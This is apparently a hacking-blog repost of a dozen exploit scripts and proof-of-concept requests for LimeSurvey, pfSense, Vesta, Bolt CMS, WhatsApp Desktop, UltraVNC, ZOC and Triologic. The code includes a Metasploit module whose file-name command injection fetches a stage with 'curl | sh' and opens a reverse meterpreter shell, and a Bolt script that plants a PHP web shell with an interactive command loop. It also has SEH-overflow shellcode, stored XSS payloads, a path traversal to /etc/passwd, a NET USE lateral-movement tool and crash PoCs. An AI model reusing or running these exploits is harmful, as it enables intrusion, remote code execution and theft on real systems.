'Name' # 6.click 'ok' # 5.Magic happen :) #!/usr/bin/env python buff = "\x41" *500 buff += "\x41" * 500 try: f=open("POC.txt","w") print "[+] Creating %s bytes payload.." %len(buff) f.write(buff) f.close() print "[+] POC created!" except: print "POC cannot be created"
  11. HireHackking

    LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting # Date: 2020-04-02 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # CVE : CVE-2020-11456 # Vulnerability Details Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel. Vulnerable Parameter : "title" # POC POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1 Host: TARGET Content-Length: 374 Cache-Control: max-age=0 Origin: http://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D Connection: close YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=
  12. HireHackking

    UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es #Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py #2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard #3.- Open UltraVNC Launcher #4.- Select "Properties" #5.- In "Password" Paste Clipboard #6.- Click on "OK" #7.- Click on "Propieties" #8.- Crashed cod = "\x41" * 300 f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w') f.write(cod) f.close()
  13. HireHackking

    Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info={}) super(update_info(info, 'Name' => "Vesta Control Panel Authenticated Remote Code Execution", 'Description' => %q{ This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user. An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As result of that backup process, when an attacker try to list existing backups injected payload will be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module ], 'References' => [ ['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'], ['CVE', '2020-10808'] ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 8083, 'WfsDelay' => 300, 'Payload' => 'python/meterpreter/reverse_tcp' }, 'Platform' => ['python'], 'Arch' => ARCH_PYTHON, 'Targets' => [[ 'Automatic', { }]], 'Privileged' => false, 'DisclosureDate' => "Mar 17 2020", 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(8083), OptString.new('USERNAME', [true, 'The username to login as']), OptString.new('PASSWORD', [true, 'The password to login with']), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) deregister_options('FTPUSER', 'FTPPASS') end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def login # # This is very simple login process. Nothing important. # We will be using cookie and csrf_token across the module so that we are global variable. # print_status('Retrieving cookie and csrf token values') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login', '/'), }) if res && res.code == 200 && !res.get_cookies.empty? @cookie = res.get_cookies @csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || '' if @csrf_token.empty? fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.') end else fail_with(Failure::Unknown, 'Something went wrong.') end print_good('Cookie and CSRF token values successfully retrieved') print_status('Authenticating to HTTP Service with given credentials') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login', '/'), 'cookie' => @cookie, 'vars_post' => { 'token' => @csrf_token, 'user' => username, 'password' => password } }) if res && res.code == 302 && !res.get_cookies.empty? print_good('Successfully authenticated to the HTTP Service') @cookie = res.get_cookies else fail_with(Failure::Unknown, 'Credentials are not valid.') end end def is_scheduled_backup_running res = trigger_scheduled_backup # # MORE explaination. # if res && res.code == 302 res = trigger_payload if res.body.include?('An existing backup is already running. Please wait for that backup to finish.') return true else print_good('It seems scheduled backup is done ..! Triggerring payload <3') return false end else fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?') end return false end def trigger_payload res = send_request_cgi({ 'method' => 'GET', 'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'), }) if res && res.code == 200 res else fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?') end end def trigger_scheduled_backup res = send_request_cgi({ 'method' => 'GET', 'cookie' => @cookie, 'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'), }) if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\// res else fail_with(Failure::Unknown, 'Something went wrong.') end end def payload_implant # # Our payload will be placed as a file name on FTP service. # Payload lenght can't be more then 255 and SPACE can't be used because of the # bug in the backend software. Due to these limitations, I used web delivery method. # # When the initial payload executed. It will execute very short perl command, which is going to fetch # actual python meterpreter first stager and execute it. # final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'" # Yet another datastore variable overriding. if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end port_restore = datastore['RPORT'] datastore['RPORT'] = 21 datastore['FTPUSER'] = username datastore['FTPPASS'] = password # # Connecting to the FTP service with same creds as web ui. # Implanting the very first stage of payload as a empty file. # if (not connect_login) fail_with(Failure::Unknown, 'Unable to authenticate to FTP service') end print_good('Successfully authenticated to the FTP service') res = send_cmd_data(['PUT', ".a';$(#{p});'"], "") if res.nil? fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server") end print_good('Successfully uploaded the payload as a file name') disconnect # Revert datastore variables. datastore['RPORT'] = port_restore datastore['SSL'] = true if ssl_restore end def exploit start_http_server payload_implant login trigger_scheduled_backup print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.') while is_scheduled_backup_running == true print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...') Rex.sleep(30) end stop_service end def on_request_uri(cli, request) print_good('First stage is executed ! Sending 2nd stage of the payload') second_stage = "python -c \"#{payload.encoded}\"" send_response(cli, second_stage, {'Content-Type'=>'text/html'}) end def start_http_server # # HttpClient and HttpServer use same SSL variable :( # We don't need a SSL for payload delivery. # if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) print_status("Second payload download URI is #{get_uri}") # We need that global variable since get_uri keep using SSL from datastore # We have to get the URI before restoring the SSL. @second_stage_url = get_uri datastore['SSL'] = true if ssl_restore end end
  14. HireHackking

    Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH) # Date: 2020-04-04 # Author: Felipe Winsnes # Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html # Version: 8 # Tested on: Windows 7 (x86) # Proof of Concept: # 1.- Run the python script, it will create a new file called "poc.m3l". # 2.- Open the Application. # 3.- Some windows warning boxes regarding sound issues may pop up, just click OK. # 4.- Click on the bottom-right button that displays an arrow and has written "LIST". # 5.- Select the file "poc.m3l". # 6.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread # Payload size: 512 bytes buf = b"" buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72" buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70" buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b" buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64" buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51" buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c" buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57" buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a" buf += b"\x70\x44\x4b\x30\x4a\x4d\x6c\x34\x4b\x6e\x6c\x5a\x71" buf += b"\x74\x38\x39\x53\x6d\x78\x49\x71\x5a\x31\x70\x51\x62" buf += b"\x6b\x70\x59\x6b\x70\x5a\x61\x46\x73\x62\x6b\x4e\x69" buf += b"\x4a\x78\x48\x63\x4f\x4a\x61\x39\x72\x6b\x4d\x64\x62" buf += b"\x6b\x4a\x61\x36\x76\x4c\x71\x59\x6f\x44\x6c\x45\x71" buf += b"\x58\x4f\x6a\x6d\x49\x71\x39\x37\x4d\x68\x39\x50\x73" buf += b"\x45\x58\x76\x69\x73\x43\x4d\x4c\x38\x4f\x4b\x31\x6d" buf += b"\x4c\x64\x72\x55\x58\x64\x72\x38\x62\x6b\x30\x58\x4f" buf += b"\x34\x6a\x61\x7a\x33\x31\x56\x54\x4b\x4c\x4c\x6e\x6b" buf += b"\x44\x4b\x50\x58\x4d\x4c\x4a\x61\x38\x53\x72\x6b\x5a" buf += b"\x64\x54\x4b\x5a\x61\x58\x50\x33\x59\x61\x34\x6d\x54" buf += b"\x6c\x64\x71\x4b\x51\x4b\x6f\x71\x62\x39\x70\x5a\x6f" buf += b"\x61\x79\x6f\x47\x70\x61\x4f\x61\x4f\x71\x4a\x44\x4b" buf += b"\x4d\x42\x38\x6b\x34\x4d\x4f\x6d\x42\x4a\x49\x71\x62" buf += b"\x6d\x42\x65\x45\x62\x69\x70\x39\x70\x59\x70\x50\x50" buf += b"\x51\x58\x4d\x61\x74\x4b\x42\x4f\x33\x57\x6b\x4f\x46" buf += b"\x75\x37\x4b\x47\x70\x6b\x6d\x6e\x4a\x5a\x6a\x53\x38" buf += b"\x46\x46\x52\x75\x65\x6d\x45\x4d\x6b\x4f\x57\x65\x6d" buf += b"\x6c\x7a\x66\x43\x4c\x6c\x4a\x35\x30\x59\x6b\x67\x70" buf += b"\x50\x75\x6b\x55\x45\x6b\x4d\x77\x5a\x73\x32\x52\x52" buf += b"\x4f\x30\x6a\x59\x70\x51\x43\x69\x6f\x38\x55\x52\x43" buf += b"\x50\x61\x32\x4c\x61\x53\x6c\x6e\x43\x35\x51\x68\x6f" buf += b"\x75\x4d\x30\x41\x41" nseh = "\x71\x41" seh = "\x41\x4a" alignment = "" alignment += "\x54\x71" # push ebx, padding alignment += "\x58\x71" # pop eax, padding alignment += "\x05\x20\x22" # add eax, 0x22002000 alignment += "\x71" # Padding alignment += "\x2D\x19\x22" # sub eax, 0x22001900 alignment += "\x71" # Padding alignment += "\x50\x71" # push eax, padding alignment += "\xC3" # retn buffer = "A" * 536 + nseh + seh + "\x41\x71\x41\x71" + alignment + "C" * 71 + buf + "C" * 2000 f = open ("poc.m3l", "w") f.write(buffer) f.close()
  15. HireHackking

    ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.emtec.com # Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe # Tested Version: 7.25.5 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py #2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard #3.- Open ZOC Terminal #4.- Select File > Create SSH Key Files... #5.- Select "Private key file:" field erease and Paste ClipBoard #6.- Click on "Create public/private key files..." #7.- Crashed buffer = "\x41" * 2000 f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w") f.write(buffer) f.close()
  16. HireHackking

    UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC) # Discovery by: chuyreds # Discovery Date: 2020-04-05 # Vendor Homepage: https://www.uvnc.com/ # Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0 # Tested Version: 1.2.4.0 # Vulnerability Type: Local # Tested on OS: Windows 10 Pro x64 es # Steps to produce the crash: #1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py #2.- Open UltraViewer_VNCServer.txt and copy content to clipboard #3.- Open UltraVNC Viewer #4.- In "VNC Server" Paste Clipboard #5.- Click on "Connect" #6.- Crashed cod = "\x41" * 256 f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w') f.write(cod) f.close()
  17. HireHackking

    WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting # Date: 2020-01-21 # Exploit Author: Gal Weizman # Vendor Homepage: https://www.whatsapp.com # Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe # Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg # Version: 0.3.9308 # Tested On: Mac OS, Windows, iPhone # CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426 // step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308) // step 2: open devtools and search in all files "t=e.id" // step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found // step 4: paste "https://example.com" in the text box and hit "Enter" // step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter" var payload = `(async function() { alert(navigator.userAgent); (async function() { // read "file:///C:/windows/system32/drivers/etc/hosts" content const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz')); const t = await r.text(); alert(t); }()) }())`; payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`; e.__x_matchedText = payload; e.__x_body = ` Innocent text ${payload} More Innocent text `; // step 6: press F8 in order for the execution to continue // result: a message should be sent to the victim that once is clicked will execute the payload above // further information: https://github.com/weizman/CVE-2019-18426
  18. HireHackking

    Bolt CMS 3.7.0 - Authenticated Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution # Date: 2020-04-05 # Exploit Author: r3m0t3nu11 # Vendor Homepage: https://bolt.cm/ # Software Link: https://bolt.cm/ # Version: up to date and 6.x # Tested on: Linux # CVE : not-yet-0day #!/usr/bin/python import requests import sys import warnings import re import os from bs4 import BeautifulSoup from colorama import init from termcolor import colored init() #pip install -r requirements.txt print(colored(''' ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌ ▐░░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌ ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌▐░▌ ▐░█▄▄▄▄▄▄▄█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░░░░░░░░░░▌ ▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▀ ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ ▐░▌ ▐░▌▐░▌ ▐░▌▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░▌ ▐░ ▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌ ▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌ ▐░░░░░░░░░░░▌▐░▌ ▐░▌▐░░░░░░░░░░░▌ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ ▀ ▀ ▀▀▀▀▀▀▀▀▀▀▀ Pre Auth rce with low credintanl #Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue")) if len(sys.argv) != 4: print((len(sys.argv))) print((colored("[~] Usage : ./bolt.py url username password","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] request = requests.session() print((colored("[+] Retrieving CSRF token to submit the login form","green"))) page = request.get(url+"/bolt/login") html_content = page.text soup = BeautifulSoup(html_content, 'html.parser') token = soup.findAll('input')[2].get("value") login_info = { "user_login[username]": username, "user_login[password]": password, "user_login[login]": "", "user_login[_token]": token } login_request = request.post(url+"/bolt/login", login_info) print((colored("[+] Login token is : {0}","green")).format(token)) aaa = request.get(url+"/bolt/profile") soup0 = BeautifulSoup(aaa.content, 'html.parser') token0 = soup0.findAll('input')[6].get("value") data_profile = { "user_profile[password][first]":"password", "user_profile[password][second]":"password", "user_profile[email]":"a@a.com", "user_profile[displayname]":"<?php system($_GET['test']);?>", "user_profile[save]":"", "user_profile[_token]":token0 } profile = request.post(url+'/bolt/profile',data_profile) cache_csrf = request.get(url+"/bolt/overview/showcases") soup1 = BeautifulSoup(cache_csrf.text, 'html.parser') csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token") asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true") soup2 = BeautifulSoup(asyncc.text, 'html.parser') tables = soup2.find_all('span', class_ = 'entry disabled') print((colored("[+] SESSION INJECTION ","green"))) for all_tables in tables: f= open("session.txt","a+") f.write(all_tables.text+"\n") f.close() num_lines = sum(1 for line in open('session.txt')) renamePostData = { "namespace": "root", "parent": "/app/cache/.sessions", "oldname": all_tables.text, "newname": "../../../public/files/test{}.php".format(num_lines), "token": csrf } rename = request.post(url+"/async/folder/rename", renamePostData) try: url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines) rev = requests.get(url1).text r1 = re.findall('php',rev) r2 = r1[0] if r2 == "php" : fileINJ = "test{}".format(num_lines) print((colored("[+] FOUND : "+fileINJ,"green"))) except IndexError: print((colored("[-] Not found.","red"))) new_name = 0 while new_name != 'quit': inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red")) if inputs == "quit" : exit() else: a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs)) aa = a.text r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa) print((r11)[0])
  19. HireHackking

    pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting # Date: 2020-04-02 # Exploit Author: Matthew Aberegg # Vendor Homepage: https://www.pfsense.org # Version: PfSense 2.4.4-P3 # Tested on: FreeBSD 11.2-RELEASE-p10 # CVE : CVE-2020-11457 # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel. # Vulnerable Parameter : descr # POC # Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name. # This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is # the id of the user containing the payload. POST /system_usermanager.php?act=new HTTP/1.1 Host: TARGET Connection: close Content-Length: 410 Cache-Control: max-age=0 Origin: https://TARGET Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Sec-Fetch-Dest: document Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Referer: https://TARGET/system_usermanager.php?act=new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d __csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save
  20. HireHackking

    LimeSurvey 4.1.11 - 'File Manager' Path Traversal

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal # Date: 2020-04-02 # Exploit Author: Matthew Aberegg, Michael Burkey # Vendor Homepage: https://www.limesurvey.org # Version: LimeSurvey 4.1.11+200316 # Tested on: Ubuntu 18.04.4 # CVE : CVE-2020-11455 # Vulnerability Details # Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey # that allows an attacker to download arbitrary files. The file manager functionality will also # delete the file after it is downloaded (if the web service account has permissions to do so), # allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file. Vulnerable Parameter : "path" # POC https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
  21. HireHackking

    Microsoft NET USE win10 - Insufficient Authentication Logic

    HireHackking posted a blog entry in Hacker Technology
    # Title: Microsoft NET USE win10 - Insufficient Authentication Logic # Date: 2020-04-04 # Author: hyp3rlinx # Vendor: www.microsoft.com # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-NET-USE-INSUFFICIENT-PASSWORD-PROMPT.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows "net use" Command Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. Used without parameters, net use retrieves a list of network connections. [Vulnerability Type] Insuffient Password Prompt [CVE Reference] N/A [Security Issue] The Windows "net use" network logon type-3 command does not prompt for authentication when the built-in Administrator account is enabled and both remote and originating systems suffer from password reuse. This also works as "standard" user but unfortunately we do not gain high integrity privileges. However, it opens the door and increases the attack surface if the box we laterally move to has other vulnerabilities present. In contrast authenticating using the "unc path" "\\x.x.x.x\c$" using an explorer type logon does prompt for credentials as expected. The authentication mechanism between the two network logon methods are inconsistent and in my opinion leaves an authentication loophole invitation. Moreover, since this targets built-in Administrator account, one would think there would be more or equal security measures in place not less. Requirements: 1) Remote system built-in Administrator account is enabled 2) Origination system users account password and the remote system Administrator passwords match (reuse). Typically, to gain Admin privileges on remote logon you may have to create and enable "LocalAccountTokenFilterPolicy" but NOT in this case. Again, the "LocalAccountTokenFilterPolicy" registry setting does NOT need to exist and is NOT enabled and has no bearing on the issue. However, if "FilterAdministratorToken" is enabled in registry on the remote system then the above loophole scenario fails. Interestingly, the "FilterAdministratorToken" setting does not seem to exist by default in the Windows registry. Therefore, if an attacker pops a box they can check "MountPoints2" registry values usually used by forensic analysts for previous network connections and try them and if theres password reuse (likely) BOOM automagic logon. This vuln occurs due to an inconsistent password dialog prompting and whether the "net use" logon method is used. When testing make sure to logout then log back in after changing passwords so the environment is clean. e.g. 1) Passwords for both systems are different and remote built-in Administrator account active: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator Enter the password for 'Administrator' to connect to '192.168.x.x': System error 5 has occurred. Access is denied. 2) Passwords for both origination system and remote match: C:\sec>net use z: \\192.168.x.x\c$ /user:Administrator The command completed successfully. By the way as a side note DCERPC calls work as well, if both systems happen to have same password. c:\>getmac /s x.x.x.x /U Administrator MSRC in their response, pointed out that "No login prompt on remote connection if both Administrator password are the same." Ok, but why does "net use" not follow the same pattern as doing a UNC-Path type of logon, where we get the expected cred dialog box? Expected result: Consistent password dialog box, no matter if passwords match or not. Actual Result: No prompt for a password if both systems passwords are the same. Tested successfully on fully patched Windows 10 using VM, also across LAN to a non-domain connected PC. [Exploit/POC] import os,re,time,signal,sys from subprocess import * from multiprocessing import Process #By John Page (aka hyp3rlinx) #Apparition Security #twitter.com/hyp3rlinx #----------------------------------- #When a remote systems built-in Administrator account is enabled and both the remote and the target system #passwords match (password reuse) theres no prompt for credentials and we get logged in automagically. # #MountPoints2 and Terminal server client hints in the Windows registry can help us. #Typically, MountPoints2 is used by Forensic analysts to help determine where an attacker laterally moved to previously. #REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##" (we want network logons) #MountPoints2 key entries are stored like '##10.2.1.40#c$' #----------------------------------------------------------- BANNER=""" _ ______________ ___ ____ __ _______ ______ / | / / ____/_ __/ / | / __ )/ / / / ___// ____/ / |/ / __/ / / / /| | / __ / / / /\__ \/ __/ / /| / /___ / / / ___ |/ /_/ / /_/ /___/ / /___ /_/ |_/_____/ /_/ /_/ |_/_____/\____//____/_____/ By Hyp3rlinx ApparitionSec """ DRIVE="X" FINDME="The command completed successfully." REG_MOUNT2='REG Query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /F "##"' REG_RDPUSERS="REG Query \"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers\""+" /s" VULN_FOUND=set() DELAY=2 #Any lower and we may get inaccurate results. rdp_server_lst=[] #Return prior network logons to remote systems. def mountpoints2(): mntpoint2_connections=[] try: p = Popen(REG_MOUNT2, stdout=PIPE, stderr=PIPE, shell=True) tmp = p.stdout.readlines() except Exception as 